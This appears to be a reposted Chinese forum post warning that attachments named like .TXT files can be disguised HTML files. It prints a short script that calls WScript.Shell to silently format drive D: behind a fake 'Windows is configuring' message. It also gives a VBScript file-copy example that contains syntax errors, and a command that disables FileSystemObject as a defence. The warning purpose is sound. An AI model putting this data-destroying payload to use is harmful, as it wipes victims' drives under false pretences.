大家都知道,現在大多數病毒的傳播媒介都是可執行文件或腳本文件,但當你收到一分附件為.TXT為後綴名的郵件時,你會不會有所警覺呢?在一定程度上也可以造成破壞!由於目前大多數人使用的是Windows系列的操作系統,而Windows設置是隱藏已知文件擴展名的。當你點擊那個看上去很友善的文件時,那些破壞性的東西就會一一跳了出來。
假如你收到一分郵件,附件裡的文件名為「美媚大放送.TXT」,你是不是會認定他肯定是純文本文件呢?那可不一定哦!它的實際文件名可以是「美媚大放送.TXT.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}」。其中的「{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}」在註冊表裡的含義是HTML文件關聯。但是存成文件時它就不會顯現出來,你看到的這個.TXT文件其實就是「美媚大放送.TXT.HTML」。那麼打開這個文件又會有什麼危害呢?如果這個文件的內容如下(警告:以下代碼可能帶有攻擊性,禁止亂用,一切使用後過自負!):
----------------------------------------------------------
〈script〉
a=new ActiveXObject("WSCript.Shell");
a.run("format.com D:/q /autotest /u");
alert("Windows is configuring the system. Please do not interrupt this process.");
〈/script〉
----------------------------------------------------------
那麼它就會調用IE運行FORMAT命令,同時顯示「Windows is configuring the system. Please do not interrupt this process.」,呵呵,這下你可就慘了。。。要注意哦~
大家大概已經注意到第二行的「WSCript」了吧,對啊,就是它在導演著這場戲。
WSCript全稱「Windows Scripting Host」,它是Windows 98新增的功能,是一種批次語言/自動執行工具——它所對應的程序「WSCript.exe」是一個腳本語言解釋器,為於WINDOWS目錄下,正是它才使得腳本可以被執行,就像執行批處理一樣。在Windows Scripting Host腳本環境裡,預定義了一些對像,通過它自帶的幾個對像,可以實現獲取環境變量、創建快捷方式、加載程序、讀寫註冊表等功能。
下面我們通過一個小的例子來說明WSCript的功能是如何的強大,而使用又是何等的簡單,被人利用的威脅有是如何之大。例如有一個.vbs文件:
Set so=CreatObject(Scripting.FileSystemObject")
so.GetFile(c:\Windows\winipcfg.exe).Copy("e:\winipcfg.exe")
這麼短短的兩行就可以COPY一個文件到指定位置。第一行:創建一個文件系統對像;第二行:打開腳本文件,c:\Windows\winipcfg.exe指明這個程序本身,是一個完整的路徑文件名。GetFile函數獲得這個文件,Copy函數將這個文件複製到E盤根目錄下。這也是現今大多數利用VBscript編寫的病毒的一個特點。由此可以看出禁止FileSystemObject對象就可以有效地控制這種病毒的傳播。禁止FileSystemObject對像可用如下命令:
regsvr32 scrrun.dll /u
[從別的論壇看到的,分享給大家]
 |
回覆時引用此文章
書籤